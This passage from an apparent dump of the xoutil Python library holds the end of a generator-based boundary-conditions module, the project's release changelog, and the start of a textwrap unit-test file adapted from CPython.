This is usually a positive\n number. Each value produced by the `unbounded generator` is added\n together. Yield True when this amount to more than the given `mass`.\n\n If any `attrs` are provided, they will be considered attributes (or keys)\n to search inside the yielded data from the bounded function. If no\n `attrs` are provided the whole data is accumulated, so it must allow\n addition. The attribute to be summed is extracted with\n `~xotl.tools.objects.get_first_of`:func:, so only the first attribute\n found is added.\n\n If the keyword argument `initial` is provided the accumulator is\n initialized with that value. By default this is 0.\n\n \"\"\"\n from xotl.tools.objects import get_first_of\n\n accum = kwargs.pop(\"initial\", 0)\n if kwargs:\n raise TypeError(\"Invalid keyword arguments %r\" % kwargs.keys())\n yield False\n while accum < mass:\n data = yield False\n accum += get_first_of(data, *attrs, default=data)\n yield True\n\n\n@boundary\ndef pred(func, skipargs=True):\n \"\"\"Allow \"normal\" functions to engage within the boundary protocol.\n\n `func` should take a single argument and return True if the boundary\n condition has been met.\n\n If `skipargs` is True then function `func` will not be called with the\n tuple ``(args, kwargs)`` upon initialization of the boundary, in that case\n only yielded values from the `unbounded generator` are passed. If you\n need to get the original arguments, set `skipargs` to False, in this case\n the first time `func` is called will be passed a single argument ``(arg,\n kwargs)``.\n\n Example::\n\n >>> @pred(lambda x: x > 10)\n ... def fibonacci():\n ... a, b = 1, 1\n ... while True:\n ... yield a\n ... 
a, b = b, a + b\n\n >>> fibonacci()\n 13\n\n \"\"\"\n sentinel = object()\n data = yield False\n if skipargs:\n data = sentinel\n while data is sentinel or not func(data):\n data = yield False\n yield True\n\n\ndef until_errors(*errors, **kwargs):\n \"\"\"Becomes True after any of `errors` has been raised.\n\n Any other exceptions (except GeneratorExit) is propagated. You must pass\n at least an error.\n\n Normally this will allow some possibly long jobs to be interrupted\n (SoftTimeLimitException in celery task, for instance) but leave some time\n for the caller to clean up things.\n\n It's assumed that your job can be properly *finalized* after any of the\n given exceptions has been raised.\n\n :keyword on_error: A callable that will only be called if the boundary\n condition is ever met, i.e if any of `errors` was\n raised. The callback is called before yielding True.\n\n .. versionadded:: 1.7.2\n\n .. versionchanged:: 1.7.5 Added the keyword argument `on_error`.\n\n \"\"\"\n if not errors:\n raise TypeError(\"catch must be called with at least an exception\")\n elif any(not issubclass(e, Exception) for e in errors):\n raise TypeError(\"catch must be called only with subclasses of Exception\")\n if any(issubclass(e, GeneratorExit) for e in errors):\n raise TypeError(\"You cannot catch GeneratorExit\")\n on_error = kwargs.pop(\"on_error\", None)\n if kwargs:\n raise TypeError(\"Invalid keyword arguments: %s\" % \", \".join(kwargs))\n\n @boundary(errors=errors)\n def _catch():\n yield False\n try:\n while True:\n yield False\n except errors:\n if on_error is not None:\n on_error()\n yield True\n\n return _catch()\n\n\ndef until(**kwargs):\n \"\"\"An idiomatic alias to other boundary definitions.\n\n - ``until(maxtime=n)`` is the same as ``timed(n)``.\n\n - ``until(times=n)`` is the same as ``times(n)``.\n\n - ``until(pred=func, skipargs=skip)`` is the same as\n ``pred(func, skipargs=skip)``.\n\n - ``until(errors=errors, **kwargs)`` is the same as\n 
``until_errors(*errors, **kwargs)``.\n\n - ``until(accumulate=mass, path=path, initial=initial)`` is the same as\n ``accumulated(mass, *path.split('.'), initial=initial)``\n\n .. warning:: You cannot mix many calls.\n\n .. versionadded:: 1.7.2\n\n \"\"\"\n maxtime = kwargs.pop(\"maxtime\", None)\n if maxtime:\n return timed(maxtime, **kwargs)\n n = kwargs.pop(\"times\", None)\n if n:\n return times(n, **kwargs)\n func = kwargs.pop(\"pred\", None)\n if func:\n return pred(func, **kwargs)\n errors = kwargs.pop(\"errors\", None)\n if errors:\n return until_errors(*errors, **kwargs)\n mass = kwargs.pop(\"accumulate\", None)\n if mass:\n path = kwargs.pop(\"path\", None)\n if path:\n return accumulated(mass, *path.split(\".\"), **kwargs)\n else:\n return accumulated(mass, **kwargs)\n raise TypeError\n\n\nclass HighLevelBoundary(BoundaryCondition):\n \"\"\"Boundary class for high-level boundary conditions.\n\n The `apply` method of this only accepts the `args`, which must be\n BoundaryCondition objects or BoundedType objects (ie. 
an instance of a\n boundary condition), then it replaces the normal boundary condition for\n that of the high-level given the subordinate definitions.\n\n \"\"\"\n\n def apply(self, boundaries, kwargs):\n assert boundaries and not kwargs\n base = super().apply(boundaries, kwargs)\n\n class rebounded(base):\n @classmethod\n def build_pred(cls):\n from types import FunctionType, GeneratorType\n\n subordinates = []\n for bound in boundaries:\n if isinstance(bound, FunctionType):\n bound = boundary(bound)\n elif isinstance(bound, GeneratorType):\n gen = bound # get a copy for the lambda below\n bound = boundary(lambda: gen)\n if isinstance(bound, BoundaryCondition):\n if bound.receive_args:\n raise TypeError('\"%s\" must be initialized' % bound.name)\n bound = bound.apply((), {})\n if isinstance(bound, BoundedType):\n sub = bound.build_pred()\n else:\n raise TypeError('Invalid argument \"%r\"' % bound)\n subordinates.append(sub)\n return self.definition(*subordinates)\n\n return rebounded\n\n\n@boundary(base=HighLevelBoundary)\ndef whenall(*subordinates):\n \"\"\"An AND-like boundary condition.\n\n It takes several boundaries and returns a single one that behaves like the\n logical AND i.e, will yield True when **all** of its subordinate boundary\n conditions have yielded True.\n\n It ensures that once a subordinate yields True it won't be sent more data,\n no matter if other subordinates keep on running and consuming data.\n\n Calls ``close()`` of all subordinates upon termination.\n\n Each `boundary` should be either:\n\n - A \"bare\" boundary definition that takes no arguments.\n\n - A boundary condition (i.e an instance of `BoundaryCondition`:class:).\n This is result of calling a boundary definition.\n\n - A generator object that complies with the boundary protocol. 
This\n cannot be tested upfront, a misbehaving generator will cause a\n RuntimeError if a boundary protocol rule is not followed.\n\n Any other type is a TypeError.\n\n \"\"\"\n preds = list(subordinates) # a copy of the list\n for pred in preds:\n next(pred)\n try:\n while preds: # out of preds it means all have yielded True\n data = yield False\n i = 0\n while preds and i < len(preds):\n pred = preds[i]\n try:\n res = pred.send(data)\n except StopIteration:\n raise RuntimeError(\"Invalid predicated in %r\" % preds)\n else:\n if res is True:\n del preds[i] # no more send() for this pred\n else:\n i += 1\n yield True\n except GeneratorExit:\n pass\n for pred in subordinates:\n pred.close()\n\n\n@boundary(base=HighLevelBoundary)\ndef whenany(*preds):\n \"\"\"An OR-like boundary condition.\n\n It takes several boundaries and returns a single one that behaves like the\n logical OR, i.e, will yield True when **any** of its subordinate boundary\n conditions yield True.\n\n Calls ``close()`` of all subordinates upon termination.\n\n Each `boundary` should be either:\n\n - A \"bare\" boundary definition that takes no arguments.\n\n - A boundary condition (i.e an instance of `BoundaryCondition`:class:).\n This is result of calling a boundary definition.\n\n - A generator object that complies with the boundary protocol. 
This\n cannot be tested upfront, a misbehaving generator will cause a\n RuntimeError if a boundary protocol rule is not followed.\n\n Any other type is a TypeError.\n\n \"\"\"\n for pred in preds:\n next(pred)\n stop = False\n try:\n while stop is not True:\n data = yield stop\n i, top = 0, len(preds)\n while not stop and i < top:\n pred = preds[i]\n try:\n stop = stop or pred.send(data)\n except StopIteration:\n raise RuntimeError(\"Invalid predicated in %r\" % preds)\n else:\n i += 1\n yield stop\n except GeneratorExit:\n pass\n for pred in preds:\n pred.close()\n\n\ndel decorator\n" }, { "alpha_fraction": 0.45768141746520996, "alphanum_fraction": 0.5584860444068909, "avg_line_length": 18.395954132080078, "blob_id": "8416fb1dc15c9032930241fa8700beed226c1415", "content_id": "baf38aa1e04c91e537e2f185b483dd384ab6bb92", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 13422, "license_type": "permissive", "max_line_length": 82, "num_lines": 692, "path": "/docs/source/HISTORY.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "Changelog\n=========\n\n2.2 series\n----------\n\nUnrelased. Release 2.2.0\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.2.0.rst\n\n\n2.1 series\n----------\n\n2020-03-10. Release 2.1.7\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.1.7.rst\n\n\n2020-01-21. Release 2.1.6\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.1.6.rst\n\n\n2019-12-12. Release 2.1.5\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.1.5.rst\n\n\n2019-10-26. Release 2.1.4\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.1.4.rst\n\n\n2019-05-26. Release 2.1.3\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.1.3.rst\n\n\n2019-05-26. Release 2.1.2\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.1.2.rst\n\n\n2019-03-13. 
Release 2.1.1\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.1.1.rst\n\n\n2019-02-27. Release 2.1.0\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.1.0.rst\n\n\n2.0 series\n----------\n\n.. note:: End-of-life for xoutil 2.0\n\n xoutil 2.0.7 will be the last release in the xoutil 2.0.x series that adds\n new functionality. Any future release in this series will be bug-fix only.\n\n Since the pair-wise releases of 1.9.x and 2.0.x some new functionality has\n been added to some version of 1.9.x that is not present in some releases of\n the 2.0.x series.\n\n This created some dose of unease for users wanting a new feature in 1.9.3\n in a package where Python 2/3 was not a true concern; they were forced to\n require 'xoutil>=1.9.3,!=2.0.0,!=2.0.1,!=2.0.2' to avoid the package\n manager to select a version without the needed feature.\n\n This end-of-life notice puts an end to this issue.\n\n\n2018-11-07. Release 2.0.9\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.0.9.rst\n\n\n2018-09-24. Release 2.0.8\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.0.8.rst\n\n\n2018-09-14. Release 2.0.7\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.0.7.rst\n\n\n2018-07-30. Release 2.0.6\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.0.6.rst\n\n\n2018-06-25. Release 2.0.5\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.0.5.rst\n\n\n2018-05-09. Release 2.0.4.1\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.0.4.1.rst\n\n\n2018-05-08. Release 2.0.4\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.0.4.rst\n\n\n2018-04-16. Release 2.0.3\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.0.3.rst\n\n\n2018-03-30. Release 2.0.2\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.0.2.rst\n\n\n2018-03-22. Release 2.0.1\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.0.1.rst\n\n\n2018-03-02. 
Release 2.0.0\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.0.0.rst\n\n\n1.9 series\n----------\n\n.. note:: End-of-life for xoutil 1.9\n\n xoutil 1.9.7 will be the last release of xoutil that adds functionality.\n Future releases will be strictly bug-fix only.\n\n.. _rel-1.9.9:\n\n2018-11-07. Release 1.9.9\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.9.9.rst\n\n.. _rel-1.9.8:\n\n2018-09-24. Release 1.9.8\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.9.8.rst\n\n.. _rel-1.9.7:\n\n2018-09-14. Release 1.9.7\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.9.7.rst\n\n\n.. _rel-1.9.6:\n\n2018-07-30. Release 1.9.6\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.9.6.rst\n\n.. _rel-1.9.5:\n\n2018-06-25. Release 1.9.5\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.9.5.rst\n\n\n.. _rel-1.9.4:\n\n2018-05-08. Release 1.9.4\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.9.4.rst\n\n\n.. _rel-1.9.3:\n\n2018-04-16. Release 1.9.3\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.9.3.rst\n\n.. _rel-1.9.2:\n\n2018-03-30. Release 1.9.2\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.9.2.rst\n\n.. _rel-1.9.1:\n\n2018-03-22. Release 1.9.1\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.9.1.rst\n\n\n2018-03-02. Release 1.9.0\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.9.0.rst\n\n\n1.8 series\n----------\n\n2018-02-24. Release 1.8.8\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.8.8.rst\n\n\n2018-01-06. Release 1.8.7\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.8.7.rst\n\n\n2018-01-02. Release 1.8.6\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.8.6.rst\n\n\n2017-12-22. Release 1.8.5\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.8.5.rst\n\n\n2017-12-15. Release 1.8.4\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.8.4.rst\n\n\n2017-11-28. 
Release 1.8.3\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.8.3.rst\n\n\n2017-11-22. Release 1.8.2\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.8.2.rst\n\n\n2017-11-17. Release 1.8.1\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.8.1.rst\n\n\n2017-11-03. Release 1.8.0\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.8.0.rst\n\n\n1.7 series\n----------\n\n2017-10-31. Release 1.7.12\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.12.rst\n\n\n2017-10-05. 1.7.11\n~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.11.rst\n\n\n2017-09-21. 1.7.10\n~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.10.rst\n\n\n2017-09-20. 1.7.9\n~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.9.rst\n\n\n2017-09-19. 1.7.8\n~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.8.rst\n\n\n2017-09-07. 1.7.7\n~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.7.rst\n\n\n2017-09-05. Release 1.7.6\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.6.rst\n\n\n2017-09-05. Release 1.7.5\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.5.rst\n\n\n2017-04-06. Release 1.7.4\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.4.rst\n\n\n2017-02-23. Release 1.7.3\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.3.rst\n\n\n2017-02-07. Release 1.7.2\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.2.rst\n\n\n2015-12-17. Release 1.7.1\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.1.rst\n\n.. warning:: Due to lack of time, we have decided to release this version\n without proper releases of 1.7.0 and 1.6.11.\n\n\n.. _release-1.7.0:\n\nUnreleased. Release 1.7.0\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.0.rst\n\n\n1.6 series\n----------\n\n\nUnreleased. Release 1.6.11\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.11.rst\n\n\n2015-04-15. 
Release 1.6.10\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.10.rst\n\n\n2015-04-03. Release 1.6.9\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.9.rst\n\n\n2015-01-26. Release 1.6.8\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.8.rst\n\n\n2014-12-17. Release 1.6.7\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.7.rst\n\n\n2014-11-26. Release 1.6.6\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.6.rst\n\n\n2014-10-13. Release 1.6.5\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.5.rst\n\n\n2014-09-13. Release 1.6.4\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.4.rst\n\n2014-08-05. Release 1.6.3\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.3.rst\n\n\n2014-08-04. Release 1.6.2\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.2.rst\n\n\n2014-07-18. Release 1.6.1\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.1.rst\n\n\n2014-06-02. Release 1.6.0\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.0.rst\n\n\n1.5 series\n----------\n\n2014-05-29. Release 1.5.6\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.5.6.rst\n\n\n2014-05-13. Release 1.5.5\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.5.5.rst\n\n2014-04-08. Release 1.5.4\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.5.4.rst\n\n\n2014-04-01. Release 1.5.3\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.5.3.rst\n\n2014-03-03. Release 1.5.2\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.5.2.rst\n\n\n2014-02-14. Release 1.5.1\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.5.1.rst\n\n\n2014-01-24. Release 1.5.0\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.5.0.rst\n\n\n1.4 series\n----------\n\n.. include:: history/changes-1.4.2.rst\n.. include:: history/changes-1.4.1.rst\n\n2013-04-26. Release 1.4.0\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. 
include:: history/changes-1.4.0.rst\n\n\n1.3 series\n----------\n\n.. include:: history/changes-1.3.0.rst\n\n1.2 series\n----------\n\n2013-04-03. Release 1.2.3\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/changes-1.2.3.rst\n\n\n2013-03-25. Release 1.2.2\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/changes-1.2.2.rst\n\n\n2013-02-14. Release 1.2.1\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/changes-1.2.1.rst\n\n\n2013-01-04. Release 1.2.0\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/changes-1.2.0.rst\n\n\n1.1 series\n----------\n\n2012-11-01. Release 1.1.4\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Introduces `xoutil.compat.iteritems_`:func:, `xoutil.compat.iterkeys_`:func:\n and `xoutil.compat.itervalues_`:func:.\n\n- `execution context <xoutil.context>`:mod: are now aware of `zope.interface`\n interfaces; so that you may ask for a context name implementing a given\n interface, instead of the name itself.\n\n- Improves xoutil.formatter documentation.\n\n- Several fixes to `xoutil.aop.classical`:mod:. It has sudden backwards\n incompatible changes.\n\n- `before` and `after` methods may use the `*args, **kwargs` idiom to get the\n passed arguments of the weaved method.\n\n- Several minor fixes: Invalid warning about Unset not in xoutil.types\n\n2012-08-22. Release 1.1.3\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Adds function `xoutil.fs.rmdirs`:func: that removes empty dirs.\n\n- Adds functions `xoutil.string.safe_join`:func:,\n `xoutil.string.safe_encode`:func:, `xoutil.string.safe_decode`:func:,\n and `xoutil.string.safe_strip`:func:; and the class\n `xoutil.string.SafeFormatter`:class:.\n\n- Adds function `xoutil.cpystack.iter_frames`:func:.\n\n2012-07-11. Release 1.1.2\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Fixes all copyrights notices and chooses the PSF License for Python 3.2.3\n as the license model for xoutil releases.\n\n- All releases from now on will be publicly available at github_.\n\n.. _github: https://github.com/merchise-autrement/xoutil/\n\n.. 
TODO: Migrate some stuffs from \"/merchise-autrement/\" by \"/merchise/\"\n\n2012-07-06. Release 1.1.1\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Improves deprecation warnings by pointing to the real calling filename\n- Removes all internal use of simple_memoize since it's deprecated. We now use\n `~xoutil.functools.lru_cache`:func:.\n\n2012-07-03. Release 1.1.0\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Created the whole documentation Sphinx directory.\n\n- Removed xoutil.future since it was not properly tested.\n\n- Removed xoutil.annotate, since it's not portable across Python's VMs.\n\n- Introduced module `xoutil.collections`:mod:\n\n- Deprecated modules `xoutil.default_dict`:mod:, `xoutil.opendict`:mod: in\n favor of `xoutil.collections`:mod:.\n\n- Backported `xoutil.functools.lru_cache`:func: from Python 3.2.\n\n- Deprecated module `xoutil.memoize`:mod: in favor of\n `xoutil.functools.lru_cache`:func:.\n\n\n1.0 series\n----------\n\n2012-06-15. Release 1.0.30\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Introduces a new module :py`xoutil.proxy`:mod:.\n\n- Starts working on the sphinx documentation so that we move to 1.1 release we\n a decent documentation.\n\n2012-06-01. Release 1.0.29.\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Introduces `xoutil.iterators.slides` and `xoutil.aop.basic.contextualized`\n\n2012-05-28. Release 1.0.28.\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Fixes normalize path and other details\n- Makes validate_attrs to work with mappings as well as objects\n- Improves complementors to use classes as a special case of sources\n- Simplifies importing of legacy modules\n- PEP8\n\n2012-05-22. Release 1.0.27.\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Removes bugs that were not checked (tested) in the previous release.\n\n2012-05-21. Release 1.0.26.\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Changes in AOP classic. 
Now you have to rename after, before and around methods\n to _after, _before and _around.\n\n It is expected that the signature of those methods change in the future.\n\n- Introducing a default argument for `xoutil.objects.get_first_of`:func:.\n\n- Other minor additions in the code. Refactoring and the like.\n\n2012-04-30. Release 1.0.25.\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Extends the classical AOP approach to modules. Implements an extended version\n with hooks.\n\n- 1.0.25.1: Makes classical/extended AOP more reliable to TypeError's in getattr.\n xoonko, may raise TypeError's for TranslatableFields.\n\n2012-04-27. Release 1.0.24.\n\n- Introduces a classical AOP implementation: xoutil.aop.classical.\n\n2012-04-10. Release 1.0.23.\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Introduces decorators: xoutil.decorators.instantiate and xoutil.aop.complementor\n\n2012-04-05. Release 1.0.22\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Allows annotation's expressions to use defined local variables. Before this\n release the following code raised an error::\n\n >>> from xoutil.annotate import annotate\n >>> x1 = 1\n >>> @annotation('(a: x1)')\n ... def dummy():\n ... pass\n Traceback (most recent call last):\n ...\n NameError: global name 'x1' is not defined\n\n- Fixes decorators to allow args-less decorators\n\n\n2012-04-03. 
Release 1.0.21\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Includes a new module `xoutil.annotate`:mod: that provides a way to place\n Python annotations in forward-compatible way.\n" }, { "alpha_fraction": 0.5800764560699463, "alphanum_fraction": 0.5819871425628662, "avg_line_length": 35.09404373168945, "blob_id": "59fd4de2991a49a4dc291ebb0ed0aedc3d527285", "content_id": "842faf4eaa0678553b5e6823f875d9fa3c640b30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11514, "license_type": "no_license", "max_line_length": 85, "num_lines": 319, "path": "/tests/test_textwrap.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "# -*- encoding: utf-8 -*-\n\n# Most of the code was taken from the Python 3.3 code base.\n#\n# Copyright (c) 2001-2012 Python Software Foundation. All rights reserved.\n#\n\nimport unittest\nfrom xoutil.future.textwrap import wrap, fill, dedent, indent\n\n\nclass BaseTestCase(unittest.TestCase):\n \"\"\"Parent class with utility methods for textwrap tests.\"\"\"\n\n def show(self, textin):\n if isinstance(textin, list):\n result = []\n for i in range(len(textin)):\n result.append(\" %d: %r\" % (i, textin[i]))\n result = \"\\n\".join(result)\n elif isinstance(textin, str):\n result = \" %s\\n\" % repr(textin)\n return result\n\n def check(self, result, expect):\n msg = \"expected:\\n%s\\nbut got:\\n%s\" % (self.show(expect), self.show(result))\n self.assertEqual(result, expect, msg)\n\n def check_wrap(self, text, width, expect, **kwargs):\n result = wrap(text, width, **kwargs)\n self.check(result, expect)\n\n def check_split(self, text, expect):\n result = self.wrapper._split(text)\n self.assertEqual(\n result, expect, \"\\nexpected %r\\n\" \"but got %r\" % (expect, result)\n )\n\n\nclass IndentTestCases(BaseTestCase):\n\n # called before each test method\n def setUp(self):\n self.text = \"\"\"\\\nThis paragraph will be filled, first without any indentation,\nand then with 
some (including a hanging indent).\"\"\"\n\n def test_fill(self):\n # Test the fill() method\n\n expect = \"\"\"\\\nThis paragraph will be filled, first\nwithout any indentation, and then with\nsome (including a hanging indent).\"\"\"\n\n result = fill(self.text, 40)\n self.check(result, expect)\n\n def test_initial_indent(self):\n # Test initial_indent parameter\n\n expect = [\n \" This paragraph will be filled,\",\n \"first without any indentation, and then\",\n \"with some (including a hanging indent).\",\n ]\n result = wrap(self.text, 40, initial_indent=\" \")\n self.check(result, expect)\n\n expect = \"\\n\".join(expect)\n result = fill(self.text, 40, initial_indent=\" \")\n self.check(result, expect)\n\n def test_subsequent_indent(self):\n # Test subsequent_indent parameter\n expect = \"\"\"\\\n * This paragraph will be filled, first\n without any indentation, and then\n with some (including a hanging\n indent).\"\"\"\n\n result = fill(self.text, 40, initial_indent=\" * \", subsequent_indent=\" \")\n self.check(result, expect)\n\n\n# Despite the similar names, DedentTestCase is *not* the inverse\n# of IndentTestCase!\nclass DedentTestCase(unittest.TestCase):\n def assertUnchanged(self, text):\n \"\"\"assert that dedent() has no effect on 'text'\"\"\"\n self.assertEqual(text, dedent(text))\n\n def test_dedent_nomargin(self):\n # No lines indented.\n text = \"Hello there.\\nHow are you?\\nOh good, I'm glad.\"\n self.assertUnchanged(text)\n\n # Similar, with a blank line.\n text = \"Hello there.\\n\\nBoo!\"\n self.assertUnchanged(text)\n\n # Some lines indented, but overall margin is still zero.\n text = \"Hello there.\\n This is indented.\"\n self.assertUnchanged(text)\n\n # Again, add a blank line.\n text = \"Hello there.\\n\\n Boo!\\n\"\n self.assertUnchanged(text)\n\n def test_dedent_even(self):\n # All lines indented by two spaces.\n text = \" Hello there.\\n How are ya?\\n Oh good.\"\n expect = \"Hello there.\\nHow are ya?\\nOh good.\"\n 
self.assertEqual(expect, dedent(text))\n\n # Same, with blank lines.\n text = \" Hello there.\\n\\n How are ya?\\n Oh good.\\n\"\n expect = \"Hello there.\\n\\nHow are ya?\\nOh good.\\n\"\n self.assertEqual(expect, dedent(text))\n\n # Now indent one of the blank lines.\n text = \" Hello there.\\n \\n How are ya?\\n Oh good.\\n\"\n expect = \"Hello there.\\n\\nHow are ya?\\nOh good.\\n\"\n self.assertEqual(expect, dedent(text))\n\n def test_dedent_uneven(self):\n # Lines indented unevenly.\n text = \"\"\"\\\n def foo():\n while 1:\n return foo\n \"\"\"\n expect = \"\"\"\\\ndef foo():\n while 1:\n return foo\n\"\"\"\n self.assertEqual(expect, dedent(text))\n\n # Uneven indentation with a blank line.\n text = \" Foo\\n Bar\\n\\n Baz\\n\"\n expect = \"Foo\\n Bar\\n\\n Baz\\n\"\n self.assertEqual(expect, dedent(text))\n\n # Uneven indentation with a whitespace-only line.\n text = \" Foo\\n Bar\\n \\n Baz\\n\"\n expect = \"Foo\\n Bar\\n\\n Baz\\n\"\n self.assertEqual(expect, dedent(text))\n\n # dedent() should not mangle internal tabs\n def test_dedent_preserve_internal_tabs(self):\n text = \" hello\\tthere\\n how are\\tyou?\"\n expect = \"hello\\tthere\\nhow are\\tyou?\"\n self.assertEqual(expect, dedent(text))\n\n # make sure that it preserves tabs when it's not making any\n # changes at all\n self.assertEqual(expect, dedent(expect))\n\n # dedent() should not mangle tabs in the margin (i.e.\n # tabs and spaces both count as margin, but are *not*\n # considered equivalent)\n def test_dedent_preserve_margin_tabs(self):\n text = \" hello there\\n\\thow are you?\"\n self.assertUnchanged(text)\n\n # same effect even if we have 8 spaces\n text = \" hello there\\n\\thow are you?\"\n self.assertUnchanged(text)\n\n # dedent() only removes whitespace that can 